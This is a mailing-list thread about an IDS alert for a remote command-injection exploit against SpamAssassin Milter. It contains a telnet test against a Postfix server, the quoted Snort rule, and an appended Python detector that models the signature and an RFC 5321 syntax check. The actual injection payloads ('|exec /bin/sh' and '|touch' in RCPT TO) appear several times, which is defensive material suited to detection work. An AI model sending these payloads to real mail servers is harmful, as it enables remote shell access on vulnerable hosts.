From: JKL
Date: Thu, 10 Feb 2011 23:10:51 +0100
To: Michael Scheidell
CC: SpamAssassin Users List, amavis-user@lists.sourceforge.net, John Meyer
Subject: Re: Fwd: RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
Message-ID: <4D54626B.6050808@klunky.co.uk>
In-Reply-To: <4D542390.5080106@secnap.com>
References: <4D542390.5080106@secnap.com>
Delivered-To: mailing list users@spamassassin.apache.org
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101208 Lightning/1.0b2 Thunderbird/3.1.7

Hi,

Seems ok with postfix unless I missed something, which is possible.

$ telnet klunky.co.uk 25
Trying 62.58.61.184...
Connected to logout.klunky.co.uk.
Escape character is '^]'.
220 klunky.co.uk ESMTP Postfix
ehlo klunky.co.uk
250-klunky.co.uk
250-PIPELINING
250-SIZE 20480000
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
MAIL FROM:
250 2.1.0 Ok
RCPT TO:root+:"|touch /tmp/foo"
501 5.1.3 Bad recipient address syntax
RCPT TO:
550 5.1.0 : Sender address rejected: User unknown in virtual mailbox table
RCPT TO:
501 5.1.3 Bad recipient address syntax
rcpt to: root+:"|exec /bin/sh 0&0 2>&0"
501 5.1.3 Bad recipient address syntax
rcpt to:&0 2>&0">
250 2.1.5 Ok
data
354 End data with .
.
qu250 2.0.0 Ok: queued as 24E96819DF
502 5.5.2 Error: command not recognized
it
221 2.0.0 Bye
Connection closed by foreign host.

$ telnet klunky.co.uk 25
Trying 62.58.61.184...
Connected to logout.klunky.co.uk.
Escape character is '^]'.
220 klunky.co.uk ESMTP Postfix
ehlo klunky.co.uk
250-klunky.co.uk
250-PIPELINING
250-SIZE 20480000
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
MAIL FROM:
250 2.1.0 Ok
rcpt to:&0 2>&0">
550 5.1.0 : Sender address rejected: User unknown in virtual mailbox table
quit
221 2.0.0 Bye
Connection closed by foreign host.

On 02/10/2011 06:42 PM, Michael Scheidell wrote:
> heads up:
>
> in case you are using spamassassin milter:
>
> active exploits going on.
>
> Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1
>
> I don't see anything on bugtraq about a fix.
>
> -------- Original Message --------
> Subject: RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
>
> The rule is only looking for this:
>
> content:"to|3A|"; depth:10; nocase; content:"+|3A|\"|7C|";
>
> Personally, I would probably block it. Although, if we're not seeing this sort of thing pop up on customers' boxes, a manual block in scanner2 is sufficient for now, right?
>
> Either way, let me know and I'll block/unblock/leave alone.
>
> --
> John Meyer
> Associate Security Engineer
> SECNAP Network Security
> Office: (561) 999-5000 x:1235
> Direct: (561) 948-2264
>
> *From:* Michael Scheidell
> *Sent:* Thursday, February 10, 2011 12:25 PM
> *To:* John Meyer
> *Cc:* Jonathan Scheidell; Anthony Wetula
> *Subject:* Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
>
> is the snort rule specific enough that you can block the offending ip for 5 mins?
>
> (if it's a real smtp server, it will retry) and legit email through.
>
> On 2/10/11 12:12 PM, John Meyer wrote:
>
> I don't like the looks of this. I blocked that IP with samtool.
>
> Payload:
>
> rcpt to: root+:"|exec /bin/sh 0&0 2>&0"
> data
> .
> quit
>
> *From:* SECNAP Network Security
> *Sent:* Thursday, February 10, 2011 12:01 PM
> *To:* security-alert@scanner2.secnap.com
> *Subject:* alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
>
> 02/10-12:00:59 TCP 62.206.228.188:56691 --> 10.70.1.33:25
> [1:2010877:3] ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
> [Classification: Attempted User Privilege Gain] [Priority: 1]
>
> --
> Michael Scheidell, CTO
> o: 561-999-5000
> d: 561-948-2259
> SECNAP Network Security Corporation
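As an added example (not code from this thread, from Postfix, or from the Snort rule's authors), the Python below models the two checks the thread touches on: the two `content:` matches quoted from the ET rule ("to:" within the first 10 bytes, case-insensitive, and "+:\"|" anywhere in the payload), and an RFC 5321 local-part syntax check of the kind that makes an MTA answer the probe with 501 Bad recipient address syntax rather than pass it on to a milter. The function names, the relaxed parsing of RCPT TO with or without angle brackets, and the constructed `SAMPLE_SESSION` are this example's own assumptions; the session reuses the two recipient strings quoted in the thread and adds two benign ones (plus-addressing and a quoted-string local part) to show that the syntax check does not reject legitimate forms.

```python
import re

# RFC 5321 local-part grammar: Dot-string / Quoted-string (written for this example).
ATEXT = r"[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]"
DOT_STRING = re.compile(rf"^{ATEXT}+(?:\.{ATEXT}+)*$")
QUOTED_STRING = re.compile(r'^"(?:[\x20-\x21\x23-\x5b\x5d-\x7e]|\\[\x20-\x7e])*"$')

RCPT_RE = re.compile(r"^\s*rcpt\s+to:\s*<?(.*?)>?\s*$", re.IGNORECASE)

# Constructed SMTP client lines, modelled on the telnet transcript in the thread.
SAMPLE_SESSION = [
    "EHLO client.example",
    "MAIL FROM:<sender@example.com>",
    "RCPT TO:<user+tag@example.com>",           # ordinary plus-addressing: '+' is legal atext
    'RCPT TO:<"john doe"@example.com>',         # legal quoted-string local part
    'RCPT TO:root+:"|touch /tmp/foo"',          # probe from the thread
    'rcpt to: root+:"|exec /bin/sh 0&0 2>&0"',  # IDS payload as quoted in the thread
    "DATA",
]


def local_part_is_valid(local_part: str) -> bool:
    """True if the local part is a Dot-string or a Quoted-string per RFC 5321."""
    return bool(DOT_STRING.match(local_part) or QUOTED_STRING.match(local_part))


def parse_rcpt(line: str):
    """Return (local_part, domain) for an RCPT TO line, or None for any other command.

    Assumption: both <addr> and bare addr are accepted, mirroring a lenient MTA.
    """
    m = RCPT_RE.match(line)
    if not m:
        return None
    addr = m.group(1)
    local, sep, domain = addr.rpartition("@")
    if not sep:
        return (addr, "")  # no domain: treat the whole string as the local part
    return (local, domain)


def matches_et_signature(payload: bytes) -> bool:
    """Model of the two content options quoted from the ET rule.

    content:"to|3A|"; depth:10; nocase;  -> 'to:' must lie within the first 10 bytes
    content:"+|3A|\\"|7C|";               -> '+:"|' anywhere in the payload
    Only these two options are modelled; nothing else from the rule is on the page.
    """
    if payload[:10].lower().find(b"to:") < 0:
        return False
    return payload.find(b'+:"|') >= 0


def check_rcpt_line(line: str):
    """Return (syntax_ok, ids_hit) for an RCPT TO line, or None if it is not one.

    syntax_ok=False is the case an MTA answers with 501 5.1.3, as in the transcript;
    ids_hit=True is the case the Snort rule would alert on regardless of the MTA's answer.
    """
    parsed = parse_rcpt(line)
    if parsed is None:
        return None
    local, _domain = parsed
    syntax_ok = local_part_is_valid(local)
    ids_hit = matches_et_signature(line.encode("latin-1", "replace"))
    return (syntax_ok, ids_hit)


def scan_transcript(lines):
    """Run check_rcpt_line over a captured session; returns (line, syntax_ok, ids_hit) per RCPT."""
    results = []
    for line in lines:
        verdict = check_rcpt_line(line)
        if verdict is not None:
            results.append((line, *verdict))
    return results


if __name__ == "__main__":
    for line, syntax_ok, ids_hit in scan_transcript(SAMPLE_SESSION):
        status = "501 Bad recipient address syntax" if not syntax_ok else "accepted syntax"
        alert = "  [ET signature match]" if ids_hit else ""
        print(f"{line!r}: {status}{alert}")
```

The two verdicts are kept separate on purpose: the MTA's syntax rejection is what JKL's transcript shows, while the IDS match fires on the wire before any MTA reply, which is why the thread treats the alert as a block/no-block decision rather than as proof of compromise. The quoted-string case is included because a legal quoted local part can contain a pipe character, so a syntax check alone is not a substitute for running a fixed milter.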